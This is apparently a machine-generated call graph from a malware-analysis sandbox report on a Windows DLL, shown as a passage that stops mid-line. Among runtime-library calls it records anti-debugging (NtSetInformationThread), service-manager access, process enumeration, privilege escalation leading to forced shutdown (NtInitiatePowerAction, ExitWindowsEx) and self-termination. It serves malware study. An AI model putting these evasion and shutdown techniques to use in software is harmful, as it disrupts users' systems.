100312->100260 100312->100307 100312->100308 100312->100311 100314 6c8589d0 std::ios_base::_Ios_base_dtor _strlen 100313->100314 100314->100239 100315 6c858f36 100314->100315 100316 6c858f1f 100314->100316 100319 6c858ecd _Yarn _strlen 100314->100319 100318 6c9c6a43 std::_Facet_Register 4 API calls 100315->100318 100317 6c9c6a43 std::_Facet_Register 4 API calls 100316->100317 100317->100319 100318->100319 100319->100260 100320 6c859354 100319->100320 100321 6c85936d 100319->100321 100324 6c859307 _Yarn 100319->100324 100322 6c9c6a43 std::_Facet_Register 4 API calls 100320->100322 100323 6c9c6a43 std::_Facet_Register 4 API calls 100321->100323 100322->100324 100323->100324 100325 6c9c5960 104 API calls 100324->100325 100327 6c8593ba std::ios_base::_Ios_base_dtor 100325->100327 100326 6c9c4ff0 4 API calls 100326->100251 100327->100239 100327->100326 100329 6c9baed6 FindFirstFileA 100328->100329 100330 6c9baed4 100328->100330 100331 6c9baf10 100329->100331 100330->100329 100332 6c9baf14 FindClose 100331->100332 100333 6c9baf72 100331->100333 100332->100331 100333->100248 100335 6c9c50ca 100334->100335 100336 6c9c5080 WaitForSingleObject CloseHandle CloseHandle 100335->100336 100337 6c9c50e3 100335->100337 100336->100335 100337->100257 100339 6c9c59b7 100338->100339 100371 6c9c5ff0 100339->100371 100341 6c9c59c8 100390 6c866ba0 100341->100390 100344 6c9c5a9f std::ios_base::_Ios_base_dtor 100347 6c88e010 67 API calls 100344->100347 100345 6c9c59ec 100348 6c9c5a54 100345->100348 100354 6c9c5a67 100345->100354 100409 6c9c6340 100345->100409 100417 6c8a2000 100345->100417 100350 6c9c5ae2 std::ios_base::_Ios_base_dtor 100347->100350 100427 6c9c5b90 100348->100427 100350->100272 100352 6c9c5a5c 100448 6c867090 100352->100448 100442 6c88e010 100354->100442 100356 6c9c6a48 100355->100356 100357 6c9c6a62 100356->100357 100360 6c9c6a64 std::_Facet_Register 100356->100360 100907 6c9cf014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100356->100907 100357->100245 100359 6c9c78c3 std::_Facet_Register 100911 6c9c9379 RaiseException 100359->100911 100360->100359 100908 6c9c9379 RaiseException 100360->100908 100362 6c9c80bc IsProcessorFeaturePresent 100368 6c9c80e1 100362->100368 100364 6c9c7883 100909 6c9c9379 RaiseException 100364->100909 100366 6c9c78a3 std::invalid_argument::invalid_argument 100910 6c9c9379 RaiseException 100366->100910 100368->100245 100370->100263 100372 6c9c6025 100371->100372 100461 6c892020 100372->100461 100374 6c9c60c6 100375 6c9c6a43 std::_Facet_Register 4 API calls 100374->100375 100376 6c9c60fe 100375->100376 100478 6c9c7327 100376->100478 100378 6c9c6112 100490 6c891d90 100378->100490 100381 6c9c61ec 100381->100341 100383 6c9c6226 100498 6c8926e0 24 API calls 4 library calls 100383->100498 100385 6c9c6238 100499 6c9c9379 RaiseException 100385->100499 100387 6c9c624d 100388 6c88e010 67 API calls 100387->100388 100389 6c9c625f 100388->100389 100389->100341 100391 6c866bd5 100390->100391 100392 6c892020 52 API calls 100391->100392 100393 6c866c68 100392->100393 100394 6c9c6a43 std::_Facet_Register 4 API calls 100393->100394 100395 6c866ca0 100394->100395 100396 6c9c7327 43 API calls 100395->100396 100397 6c866cb4 100396->100397 100398 6c891d90 89 API calls 100397->100398 100399 6c866d5d 100398->100399 100400 6c866d8e 100399->100400 100809 6c892250 30 API calls 100399->100809 100400->100345 100402 6c866dc8 100810 6c8926e0 24 API calls 4 library calls 100402->100810 100404 6c866dda 100811 6c9c9379 RaiseException 100404->100811 100406 6c866def 100407 6c88e010 67 API calls 100406->100407 100408 6c866e0f 100407->100408 100408->100345 100410 6c9c638d 100409->100410 100812 6c9c65a0 100410->100812 100413 6c9c647c 100413->100345 100416 6c9c63a5 100416->100413 100830 6c892250 30 API calls 100416->100830 100831 6c8926e0 24 API calls 4 library calls 100416->100831 100832 6c9c9379 RaiseException 100416->100832 100418 6c8a203f 100417->100418 100422 6c8a2053 100418->100422 100841 6c893560 32 API calls std::_Xinvalid_argument 100418->100841 100420 6c8a210e 100424 6c8a2121 100420->100424 100842 6c8937e0 32 API calls std::_Xinvalid_argument 100420->100842 100422->100420 100843 6c892250 30 API calls 100422->100843 100844 6c8926e0 24 API calls 4 library calls 100422->100844 100845 6c9c9379 RaiseException 100422->100845 100424->100345 100428 6c9c5b9e 100427->100428 100432 6c9c5bd1 100427->100432 100846 6c8901f0 100428->100846 100430 6c9c5c83 100430->100352 100432->100430 100850 6c892250 30 API calls 100432->100850 100434 6c9d0b18 67 API calls 100434->100432 100435 6c9c5cae 100851 6c892340 24 API calls 100435->100851 100437 6c9c5cbe 100852 6c9c9379 RaiseException 100437->100852 100439 6c9c5cc9 100440 6c88e010 67 API calls 100439->100440 100441 6c9c5d22 std::ios_base::_Ios_base_dtor 100440->100441 100441->100352 100443 6c88e04b 100442->100443 100444 6c8901f0 64 API calls 100443->100444 100447 6c88e0a3 100443->100447 100445 6c88e098 100444->100445 100446 6c9d0b18 67 API calls 100445->100446 100446->100447 100447->100344 100449 6c86709e 100448->100449 100452 6c8670d1 100448->100452 100451 6c8901f0 64 API calls 100449->100451 100450 6c867183 100450->100354 100453 6c8670c4 100451->100453 100452->100450 100904 6c892250 30 API calls 100452->100904 100455 6c9d0b18 67 API calls 100453->100455 100455->100452 100456 6c8671ae 100905 6c892340 24 API calls 100456->100905 100458 6c8671be 100906 6c9c9379 RaiseException 100458->100906 100460 6c8671c9 100462 6c9c6a43 std::_Facet_Register 4 API calls 100461->100462 100463 6c89207e 100462->100463 100464 6c9c7327 43 API calls 100463->100464 100465 6c892092 100464->100465 100500 6c892f60 42 API calls 4 library calls 100465->100500 100467 6c8920c8 100468 6c89210d 100467->100468 100469 6c892136 100467->100469 100470 6c892120 100468->100470 100501 6c9c6f8e 9 API calls 2 library calls 100468->100501 100502 6c892250 30 API calls 100469->100502 100470->100374 100473 6c89215b 100503 6c892340 24 API calls 100473->100503 100475 6c892171 100504 6c9c9379 RaiseException 100475->100504 100477 6c89217c 100477->100374 100479 6c9c7333 __EH_prolog3 100478->100479 100505 6c9c6eb5 100479->100505 100484 6c9c7351 100519 6c9c73ba 39 API calls std::locale::_Setgloballocale 100484->100519 100486 6c9c73ac 100486->100378 100487 6c9c7359 100520 6c9c71b1 HeapFree GetLastError _Yarn 100487->100520 100489 6c9c736f 100511 6c9c6ee6 100489->100511 100491 6c891ddc 100490->100491 100492 6c891dc7 100490->100492 100525 6c9c7447 100491->100525 100492->100381 100497 6c892250 30 API calls 100492->100497 100496 6c891e82 100497->100383 100498->100385 100499->100387 100500->100467 100501->100470 100502->100473 100503->100475 100504->100477 100506 6c9c6ecb 100505->100506 100507 6c9c6ec4 100505->100507 100510 6c9c6ec9 100506->100510 100522 6c9c858b EnterCriticalSection 100506->100522 100521 6c9d03cd 6 API calls std::_Lockit::_Lockit 100507->100521 100510->100489 100518 6c9c7230 6 API calls 2 library calls 100510->100518 100512 6c9d03db 100511->100512 100513 6c9c6ef0 100511->100513 100524 6c9d03b6 LeaveCriticalSection 100512->100524 100517 6c9c6f03 100513->100517 100523 6c9c8599 LeaveCriticalSection 100513->100523 100516 6c9d03e2 100516->100486 100517->100486 100518->100484 100519->100487 100520->100489 100521->100510 100522->100510 100523->100517 100524->100516 100527 6c9c7450 100525->100527 100526 6c891dea 100526->100492 100533 6c9cc563 18 API calls __cftoe 100526->100533 100527->100526 100534 6c9cfd4a 100527->100534 100529 6c9c749c 100529->100526 100545 6c9cfa58 65 API calls 100529->100545 100531 6c9c74b7 100531->100526 100546 6c9d0b18 100531->100546 100533->100496 100535 6c9cfd55 __wsopen_s 100534->100535 100536 6c9cfd68 100535->100536 100537 6c9cfd88 100535->100537 100571 6c9d0120 18 API calls __cftoe 100536->100571 100544 6c9cfd78 100537->100544 100557 6c9dae0c 100537->100557 100544->100529 100545->100531 100547 6c9d0b24 __wsopen_s 100546->100547 100548 6c9d0b2e 100547->100548 100549 6c9d0b43 100547->100549 100695 6c9d0120 18 API calls __cftoe 100548->100695 100554 6c9d0b3e 100549->100554 100680 6c9cc5a9 EnterCriticalSection 100549->100680 100552 6c9d0b60 100681 6c9d0b9c 100552->100681 100554->100526 100555 6c9d0b6b 100696 6c9d0b92 LeaveCriticalSection 100555->100696 100558 6c9dae18 __wsopen_s 100557->100558 100573 6c9d039f EnterCriticalSection 100558->100573 100560 6c9dae26 100574 6c9daeb0 100560->100574 100565 6c9daf72 100566 6c9db091 100565->100566 100598 6c9db114 100566->100598 100569 6c9cfdcc 100572 6c9cfdf5 LeaveCriticalSection 100569->100572 100571->100544 100572->100544 100573->100560 100582 6c9daed3 100574->100582 100575 6c9dae33 100588 6c9dae6c 100575->100588 100576 6c9daf2b 100593 6c9d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100576->100593 100579 6c9daf34 100594 6c9d47bb HeapFree GetLastError _free 100579->100594 100581 6c9daf3d 100581->100575 100595 6c9d6c1f 6 API calls std::_Lockit::_Lockit 100581->100595 100582->100575 100582->100576 100582->100582 100591 6c9cc5a9 EnterCriticalSection 100582->100591 100592 6c9cc5bd LeaveCriticalSection 100582->100592 100584 6c9daf5c 100596 6c9cc5a9 EnterCriticalSection 100584->100596 100587 6c9daf6f 100587->100575 100597 6c9d03b6 LeaveCriticalSection 100588->100597 100590 6c9cfda3 100590->100544 100590->100565 100591->100582 100592->100582 100593->100579 100594->100581 100595->100584 100596->100587 100597->100590 100599 6c9db133 100598->100599 100600 6c9db146 100599->100600 100602 6c9db15b 100599->100602 100614 6c9d0120 18 API calls __cftoe 100600->100614 100603 6c9db27b 100602->100603 100615 6c9e3ea8 37 API calls __cftoe 100602->100615 100604 6c9db0a7 100603->100604 100618 6c9d0120 18 API calls __cftoe 100603->100618 100604->100569 100611 6c9e3fde 100604->100611 100607 6c9db2cb 100607->100603 100616 6c9e3ea8 37 API calls __cftoe 100607->100616 100609 6c9db2e9 100609->100603 100617 6c9e3ea8 37 API calls __cftoe 100609->100617 100619 6c9e4396 100611->100619 100614->100604 100615->100607 100616->100609 100617->100603 100618->100604 100620 6c9e43a2 __wsopen_s 100619->100620 100621 6c9e43d4 100620->100621 100622 6c9e43a9 100620->100622 100628 6c9e3ffe 100621->100628 100637 6c9d0120 18 API calls __cftoe 100622->100637 100627 6c9e3ff9 100627->100569 100639 6c9d06cb 100628->100639 100633 6c9e4034 100635 6c9e4066 100633->100635 100679 6c9d47bb HeapFree GetLastError _free 100633->100679 100638 6c9e442b LeaveCriticalSection __wsopen_s 100635->100638 100637->100627 100638->100627 100640 6c9cbceb __cftoe 37 API calls 100639->100640 100641 6c9d06dd 100640->100641 100642 6c9d06ef 100641->100642 100643 6c9d69d5 __wsopen_s 5 API calls 100641->100643 100644 6c9cbdf6 100642->100644 100643->100642 100645 6c9cbe4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100644->100645 100646 6c9cbe0e 100645->100646 100646->100633 100647 6c9e406c 100646->100647 100648 6c9e44ec __wsopen_s 18 API calls 100647->100648 100649 6c9e4089 100648->100649 100650 6c9e160c __wsopen_s 14 API calls 100649->100650 100654 6c9e409e __dosmaperr 100649->100654 100651 6c9e40bc 100650->100651 100652 6c9e4457 __wsopen_s CreateFileW 100651->100652 100651->100654 100659 6c9e4115 100652->100659 100653 6c9e4192 GetFileType 100655 6c9e419d GetLastError 100653->100655 100656 6c9e41e4 100653->100656 100654->100633 100658 6c9cf9f2 __dosmaperr 100655->100658 100662 6c9e17b0 __wsopen_s SetStdHandle 100656->100662 100657 6c9e4167 GetLastError 100657->100654 100660 6c9e41ab CloseHandle 100658->100660 100659->100653 100659->100657 100661 6c9e4457 __wsopen_s CreateFileW 100659->100661 100660->100654 100675 6c9e41d4 100660->100675 100663 6c9e415a 100661->100663 100664 6c9e4205 100662->100664 100663->100653 100663->100657 100665 6c9e4251 100664->100665 100667 6c9e4666 __wsopen_s 70 API calls 100664->100667 100666 6c9e4710 __wsopen_s 70 API calls 100665->100666 100669 6c9e4258 100665->100669 100668 6c9e4286 100666->100668 100667->100665 100668->100669 100670 6c9e4294 100668->100670 100671 6c9db925 __wsopen_s 21 API calls 100669->100671 100670->100654 100672 6c9e4310 CloseHandle 100670->100672 100671->100654 100673 6c9e4457 __wsopen_s CreateFileW 100672->100673 100674 6c9e433b 100673->100674 100674->100675 100676 6c9e4345 GetLastError 100674->100676 100675->100654 100677 6c9e4351 __dosmaperr 100676->100677 100678 6c9e171f __wsopen_s SetStdHandle 100677->100678 100678->100675 100679->100635 100680->100552 100682 6c9d0bbe 100681->100682 100683 6c9d0ba9 100681->100683 100687 6c9d0bb9 100682->100687 100697 6c9d0cb9 100682->100697 100719 6c9d0120 18 API calls __cftoe 100683->100719 100687->100555 100691 6c9d0be1 100712 6c9db898 100691->100712 100693 6c9d0be7 100693->100687 100720 6c9d47bb HeapFree GetLastError _free 100693->100720 100695->100554 100696->100554 100698 6c9d0bd3 100697->100698 100699 6c9d0cd1 100697->100699 100703 6c9d873e 100698->100703 100699->100698 100700 6c9d9c60 18 API calls 100699->100700 100701 6c9d0cef 100700->100701 100721 6c9dbb6c 100701->100721 100704 6c9d0bdb 100703->100704 100705 6c9d8755 100703->100705 100707 6c9d9c60 100704->100707 100705->100704 100777 6c9d47bb HeapFree GetLastError _free 100705->100777 100708 6c9d9c6c 100707->100708 100709 6c9d9c81 100707->100709 100778 6c9d0120 18 API calls __cftoe 100708->100778 100709->100691 100711 6c9d9c7c 100711->100691 100713 6c9db8be 100712->100713 100717 6c9db8a9 __dosmaperr 100712->100717 100714 6c9db8e5 100713->100714 100716 6c9db907 __dosmaperr 100713->100716 100779 6c9db9c1 100714->100779 100787 6c9d0120 18 API calls __cftoe 100716->100787 100717->100693 100719->100687 100720->100687 100723 6c9dbb78 __wsopen_s 100721->100723 100722 6c9dbb80 __dosmaperr 100722->100698 100723->100722 100724 6c9dbc33 __dosmaperr 100723->100724 100725 6c9dbbca 100723->100725 100762 6c9d0120 18 API calls __cftoe 100724->100762 100732 6c9e1990 EnterCriticalSection 100725->100732 100727 6c9dbbd0 100730 6c9dbbec __dosmaperr 100727->100730 100733 6c9dbc5e 100727->100733 100761 6c9dbc2b LeaveCriticalSection __wsopen_s 100730->100761 100732->100727 100734 6c9dbc80 100733->100734 100760 6c9dbc9c __dosmaperr 100733->100760 100735 6c9dbcd4 100734->100735 100737 6c9dbc84 __dosmaperr 100734->100737 100736 6c9dbce7 100735->100736 100771 6c9dac69 20 API calls __wsopen_s 100735->100771 100763 6c9dbe40 100736->100763 100770 6c9d0120 18 API calls __cftoe 100737->100770 100742 6c9dbcfd 100746 6c9dbd26 100742->100746 100747 6c9dbd01 100742->100747 100743 6c9dbd3c 100744 6c9dbd95 WriteFile 100743->100744 100745 6c9dbd50 100743->100745 100748 6c9dbdb9 GetLastError 100744->100748 100744->100760 100750 6c9dbd5b 100745->100750 100751 6c9dbd85 100745->100751 100773 6c9dbeb1 43 API calls 5 library calls 100746->100773 100747->100760 100772 6c9dc25b 6 API calls __wsopen_s 100747->100772 100748->100760 100752 6c9dbd75 100750->100752 100753 6c9dbd60 100750->100753 100776 6c9dc2c3 7 API calls 2 library calls 100751->100776 100775 6c9dc487 8 API calls 3 library calls 100752->100775 100756 6c9dbd65 100753->100756 100753->100760 100774 6c9dc39e 7 API calls 2 library calls 100756->100774 100758 6c9dbd73 100758->100760 100760->100730 100761->100722 100762->100722 100764 6c9e19e5 __wsopen_s 18 API calls 100763->100764 100766 6c9dbe51 100764->100766 100765 6c9dbcf8 100765->100742 100765->100743 100766->100765 100767 6c9d49b2 __Getctype 37 API calls 100766->100767 100768 6c9dbe74 100767->100768 100768->100765 100769 6c9dbe8e GetConsoleMode 100768->100769 100769->100765 100770->100760 100771->100736 100772->100760 100773->100760 100774->100758 100775->100758 100776->100758 100777->100704 100778->100711 100780 6c9db9cd __wsopen_s 100779->100780 100788 6c9e1990 EnterCriticalSection 100780->100788 100782 6c9db9db 100784 6c9dba08 100782->100784 100789 6c9db925 100782->100789 100802 6c9dba41 LeaveCriticalSection __wsopen_s 100784->100802 100786 6c9dba2a 100786->100717 100787->100717 100788->100782 100803 6c9e15a2 100789->100803 100791 6c9db935 100792 6c9db93b 100791->100792 100793 6c9db96d 100791->100793 100795 6c9e15a2 __wsopen_s 18 API calls 100791->100795 100808 6c9e171f SetStdHandle __dosmaperr __wsopen_s 100792->100808 100793->100792 100796 6c9e15a2 __wsopen_s 18 API calls 100793->100796 100797 6c9db964 100795->100797 100798 6c9db979 CloseHandle 100796->100798 100800 6c9e15a2 __wsopen_s 18 API calls 100797->100800 100798->100792 100801 6c9db985 GetLastError 100798->100801 100799 6c9db993 __dosmaperr 100799->100784 100800->100793 100801->100792 100802->100786 100804 6c9e15af __dosmaperr 100803->100804 100806 6c9e15c4 __dosmaperr 100803->100806 100804->100791 100805 6c9e15e9 100805->100791 100806->100805 100807 6c9d0120 __cftoe 18 API calls 100806->100807 100807->100804 100808->100799 100809->100402 100810->100404 100811->100406 100813 6c9c65dc 100812->100813 100814 6c9c6608 100812->100814 100828 6c9c6601 100813->100828 100835 6c892250 30 API calls 100813->100835 100820 6c9c6619 100814->100820 100833 6c893560 32 API calls std::_Xinvalid_argument 100814->100833 100817 6c9c67e8 100836 6c892340 24 API calls 100817->100836 100819 6c9c67f7 100837 6c9c9379 RaiseException 100819->100837 100820->100828 100834 6c892f60 42 API calls 4 library calls 100820->100834 100824 6c9c6827 100839 6c892340 24 API calls 100824->100839 100826 6c9c683d 100840 6c9c9379 RaiseException 100826->100840 100828->100416 100829 6c9c6653 100829->100828 100838 6c892250 30 API calls 100829->100838 100830->100416 100831->100416 100832->100416 100833->100820 100834->100829 100835->100817 100836->100819 100837->100829 100838->100824 100839->100826 100840->100828 100841->100422 100842->100424 100843->100422 100844->100422 100845->100422 100847 6c89022e 100846->100847 100848 6c8904d6 100847->100848 100853 6c9d17db 100847->100853 100848->100434 100850->100435 100851->100437 100852->100439 100854 6c9d17e9 100853->100854 100855 6c9d1806 100853->100855 100854->100855 100856 6c9d180a 100854->100856 100857 6c9d17f6 100854->100857 100855->100847 100861 6c9d1a02 100856->100861 100869 6c9d0120 18 API calls __cftoe 100857->100869 100862 6c9d1a0e __wsopen_s 100861->100862 100870 6c9cc5a9 EnterCriticalSection 100862->100870 100864 6c9d1a1c 100871 6c9d19bf 100864->100871 100868 6c9d183c 100868->100847 100869->100855 100870->100864 100879 6c9d85a6 100871->100879 100877 6c9d19f9 100878 6c9d1a51 LeaveCriticalSection 100877->100878 100878->100868 100880 6c9d9c60 18 API calls 100879->100880 100881 6c9d85b7 100880->100881 100896 6c9e19e5 100881->100896 100883 6c9d19d3 100886 6c9d183e 100883->100886 100884 6c9d85bd __wsopen_s 100884->100883 100901 6c9d47bb HeapFree GetLastError _free 100884->100901 100887 6c9d1850 100886->100887 100890 6c9d186e 100886->100890 100888 6c9d185e 100887->100888 100887->100890 100893 6c9d1886 _Yarn 100887->100893 100903 6c9d0120 18 API calls __cftoe 100888->100903 100895 6c9d8659 62 API calls 100890->100895 100891 6c9d0cb9 62 API calls 100891->100893 100892 6c9d9c60 18 API calls 100892->100893 100893->100890 100893->100891 100893->100892 100894 6c9dbb6c __wsopen_s 62 API calls 100893->100894 100894->100893 100895->100877 100897 6c9e19f2 100896->100897 100899 6c9e19ff 100896->100899 100897->100884 100898 6c9e1a0b 100898->100884 100899->100898 100902 6c9d0120 18 API calls __cftoe 100899->100902 100901->100883 100902->100897 100903->100890 100904->100456 100905->100458 100906->100460 100907->100356 100908->100364 100909->100366 100910->100359 100911->100362 100912 6c9cef3f 100913 6c9cef4b __wsopen_s 100912->100913 100914 6c9cef5f 100913->100914 100915 6c9cef52 GetLastError ExitThread 100913->100915 100924 6c9d49b2 GetLastError 100914->100924 100920 6c9cef7b 100958 6c9ceeaa 16 API calls 2 library calls 100920->100958 100923 6c9cef9d 100925 6c9d49c9 100924->100925 100926 6c9d49cf 100924->100926 100959 6c9d6b23 6 API calls std::_Lockit::_Lockit 100925->100959 100930 6c9d49d5 SetLastError 100926->100930 100960 6c9d6b62 6 API calls std::_Lockit::_Lockit 100926->100960 100929 6c9d49ed 100929->100930 100931 6c9d49f1 100929->100931 100937 6c9d4a69 100930->100937 100938 6c9cef64 100930->100938 100961 6c9d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100931->100961 100933 6c9d49fd 100935 6c9d4a1c 100933->100935 100936 6c9d4a05 100933->100936 100964 6c9d6b62 6 API calls std::_Lockit::_Lockit 100935->100964 100962 6c9d6b62 6 API calls std::_Lockit::_Lockit 100936->100962 100967 6c9d0ac9 37 API calls std::locale::_Setgloballocale 100937->100967 100952 6c9d9d66 100938->100952 100942 6c9d4a13 100963 6c9d47bb HeapFree GetLastError _free 100942->100963 100944 6c9d4a28 100945 6c9d4a3d 100944->100945 100946 6c9d4a2c 100944->100946 100966 6c9d47bb HeapFree GetLastError _free 100945->100966 100965 6c9d6b62 6 API calls std::_Lockit::_Lockit 100946->100965 100949 6c9d4a19 100949->100930 100951 6c9d4a4f 100951->100930 100953 6c9d9d78 GetPEB 100952->100953 100954 6c9cef6f 100952->100954 100953->100954 100955 6c9d9d8b 100953->100955 100954->100920 100957 6c9d6d6f 5 API calls std::_Lockit::_Lockit 100954->100957 100968 6c9d6e18 5 API calls std::_Lockit::_Lockit 100955->100968 100957->100920 100958->100923 100959->100926 100960->100929 100961->100933 100962->100942 100963->100949 100964->100944 100965->100942 100966->100951 100968->100954 100969 6c843d62 100971 6c843bc0 100969->100971 100970 6c843e8a GetCurrentThread NtSetInformationThread 100972 6c843eea 100970->100972 100971->100970 100973 6c844b53 100974 6c9c6a43 std::_Facet_Register 4 API calls 100973->100974 100975 6c844b5c _Yarn 100974->100975 100976 6c9baec0 2 API calls 100975->100976 100981 6c844bae std::ios_base::_Ios_base_dtor 100976->100981 100977 6c86639e 101164 6c9d0130 18 API calls 2 library calls 100977->101164 100979 6c844cff 100980 6c845164 CreateFileA CloseHandle 100985 6c8451ec 100980->100985 100981->100977 100981->100979 100981->100980 100982 6c85245a _Yarn _strlen 100981->100982 100982->100977 100983 6c9baec0 2 API calls 100982->100983 101000 6c852a83 std::ios_base::_Ios_base_dtor 100983->101000 101131 6c9c5120 OpenSCManagerA 100985->101131 100987 6c84fc00 101157 6c9c5240 CreateToolhelp32Snapshot 100987->101157 100989 6c9c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101026 6c845478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100989->101026 100992 6c9baec0 2 API calls 100992->101026 100993 6c8537d0 Sleep 101037 6c8537e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100993->101037 100994 6c8663b2 101165 6c8415e0 18 API calls std::ios_base::_Ios_base_dtor 100994->101165 100995 6c9c5240 4 API calls 101012 6c85053a 100995->101012 100996 6c9c5240 4 API calls 101022 6c8512e2 100996->101022 100998 6c84ffe3 100998->100995 101004 6c850abc 100998->101004 100999 6c8664f8 101000->100977 101135 6c9b0390 101000->101135 101001 6c866ba0 104 API calls 101001->101026 101002 6c866e60 32 API calls 101002->101026 101004->100982 101004->100996 101005 6c867090 77 API calls 101005->101026 101006 6c9c5240 4 API calls 101006->101004 101007 6c9c5240 4 API calls 101028 6c851dd9 101007->101028 101008 6c85211c 101008->100982 101010 6c85241a 101008->101010 101009 6c88e010 67 API calls 101009->101026 101013 6c9b0390 11 API calls 101010->101013 101011 6c9baec0 2 API calls 101011->101037 101012->101004 101012->101006 101015 6c85244d 101013->101015 101014 6c846722 101154 6c9c1880 25 API calls 4 library calls 101014->101154 101163 6c9c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101015->101163 101017 6c852452 Sleep 101017->100982 101018 6c8516ac 101019 6c846162 101020 6c9c4ff0 4 API calls 101030 6c84775a _strlen 101020->101030 101021 6c84740b 101021->101020 101022->101007 101022->101008 101022->101018 101023 6c9c5240 4 API calls 101023->101008 101024 6c866ba0 104 API calls 101024->101037 101026->100977 101026->100987 101026->100989 101026->100992 101026->101001 101026->101002 101026->101005 101026->101009 101026->101014 101026->101019 101027 6c867090 77 API calls 101027->101037 101028->101008 101028->101023 101029 6c88e010 67 API calls 101029->101037 101030->100977 101031 6c847b92 101030->101031 101032 6c847ba9 101030->101032 101035 6c847b43 _Yarn 101030->101035 101033 6c9c6a43 std::_Facet_Register 4 API calls 101031->101033 101034 6c9c6a43 std::_Facet_Register 4 API calls 101032->101034 101033->101035 101034->101035 101036 6c9baec0 2 API calls 101035->101036 101044 6c847be7 std::ios_base::_Ios_base_dtor 101036->101044 101037->100977 101037->101011 101037->101024 101037->101027 101037->101029 101144 6c866e60 101037->101144 101038 6c9c4ff0 4 API calls 101049 6c848a07 101038->101049 101039 6c849d7f 101042 6c9c6a43 std::_Facet_Register 4 API calls 101039->101042 101040 6c849d68 101041 6c9c6a43 std::_Facet_Register 4 API calls 101040->101041 101043 6c849d18 _Yarn 101041->101043 101042->101043 101045 6c9baec0 2 API calls 101043->101045 101044->100977 101044->101038 101046 6c84962c _strlen 101044->101046 101047 6c848387 101044->101047 101052 6c849dbd std::ios_base::_Ios_base_dtor 101045->101052 101046->100977 101046->101039 101046->101040 101046->101043 101048 6c9c4ff0 4 API calls 101059 6c849120 101048->101059 101049->101048 101050 6c9c4ff0 4 API calls 101067 6c84a215 _strlen 101050->101067 101051 6c9c4ff0 4 API calls 101053 6c849624 101051->101053 101052->100977 101052->101050 101060 6c84e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101052->101060 101155 6c9c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101053->101155 101054 6c9c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101054->101060 101056 6c9baec0 2 API calls 101056->101060 101057 6c84f7b1 101156 6c9c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101057->101156 101058 6c84ed02 Sleep 101079 6c84e8c1 101058->101079 101059->101051 101060->100977 101060->101054 101060->101056 101060->101057 101060->101058 101062 6c84e8dd GetCurrentProcess TerminateProcess 101062->101060 101063 6c84a9a4 101065 6c9c6a43 std::_Facet_Register 4 API calls 101063->101065 101064 6c84a9bb 101066 6c9c6a43 std::_Facet_Register 4 API calls 101064->101066 101074 6c84a953 _Yarn _strlen 101065->101074 101066->101074 101067->100977 101067->101063 101067->101064 101067->101074 101068 6c9c4ff0 4 API calls 101068->101079 101069 6c84fbb8 101071 6c84fbe8 ExitWindowsEx Sleep 101069->101071 101070 6c84f7c0 101070->101069 101071->100987 101072 6c84aff0 101075 6c9c6a43 std::_Facet_Register 4 API calls 101072->101075 101073 6c84b009 101076 6c9c6a43 std::_Facet_Register 4 API calls 101073->101076 101074->100994 101074->101072 101074->101073 101077 6c84afa0 _Yarn 101074->101077 101075->101077 101076->101077 101078 6c9c5960 104 API calls 101077->101078 101080 6c84b059 std::ios_base::_Ios_base_dtor _strlen 101078->101080 101079->101060 101079->101062 101079->101068 101080->100977 101081 6c84b443 101080->101081 101082 6c84b42c 101080->101082 101085 6c84b3da _Yarn _strlen 101080->101085 101084 6c9c6a43 std::_Facet_Register 4 API calls 101081->101084 101083 6c9c6a43 std::_Facet_Register 4 API calls 101082->101083 101083->101085 101084->101085 101085->100994 101086 6c84b7b7 101085->101086 101087 6c84b79e 101085->101087 101090 6c84b751 _Yarn 101085->101090 101089 6c9c6a43 std::_Facet_Register 4 API calls 101086->101089 101088 6c9c6a43 std::_Facet_Register 4 API calls 101087->101088 101088->101090 101089->101090 101091 6c9c5960 104 API calls 101090->101091 101092 6c84b804 std::ios_base::_Ios_base_dtor _strlen 101091->101092 101092->100977 101093 6c84bc26 101092->101093 101094 6c84bc0f 101092->101094 101097 6c84bbbd _Yarn _strlen 101092->101097 101096 6c9c6a43 std::_Facet_Register 4 API calls 101093->101096 101095 6c9c6a43 std::_Facet_Register 4 API calls 101094->101095 101095->101097 101096->101097 101097->100994 101098 6c84c075 101097->101098 101099 6c84c08e 101097->101099 101102 6c84c028 _Yarn 101097->101102 101100 6c9c6a43 std::_Facet_Register 4 API calls 101098->101100 101101 6c9c6a43 std::_Facet_Register 4 API calls 101099->101101 101100->101102 101101->101102 101103 6c9c5960 104 API calls 101102->101103 101108 6c84c0db std::ios_base::_Ios_base_dtor _strlen 101103->101108 101104 6c84c7a5 101106 6c9c6a43 std::_Facet_Register 4 API calls 101104->101106 101105 6c84c7bc 101107 6c9c6a43 std::_Facet_Register 4 API calls 101105->101107 101115 6c84c753 _Yarn _strlen 101106->101115 101107->101115 101108->100977 101108->101104 101108->101105 101108->101115 101109 6c84d406 101112 6c9c6a43 std::_Facet_Register 4 API calls 101109->101112 101110 6c84d3ed 101111 6c9c6a43 std::_Facet_Register 4 API calls 101110->101111 101113 6c84d39a _Yarn 101111->101113 101112->101113 101114 6c9c5960 104 API calls 101113->101114 101116 6c84d458 std::ios_base::_Ios_base_dtor _strlen 101114->101116 101115->100994 101115->101109 101115->101110 101115->101113 101121 6c84cb2f 101115->101121 101116->100977 101117 6c84d8a4 101116->101117 101118 6c84d8bb 101116->101118 101122 6c84d852 _Yarn _strlen 101116->101122 101119 6c9c6a43 std::_Facet_Register 4 API calls 101117->101119 101120 6c9c6a43 std::_Facet_Register 4 API calls 101118->101120 101119->101122 101120->101122 101122->100994 101123 6c84dcb6 101122->101123 101124 6c84dccf 101122->101124 101127 6c84dc69 _Yarn 101122->101127 101125 6c9c6a43 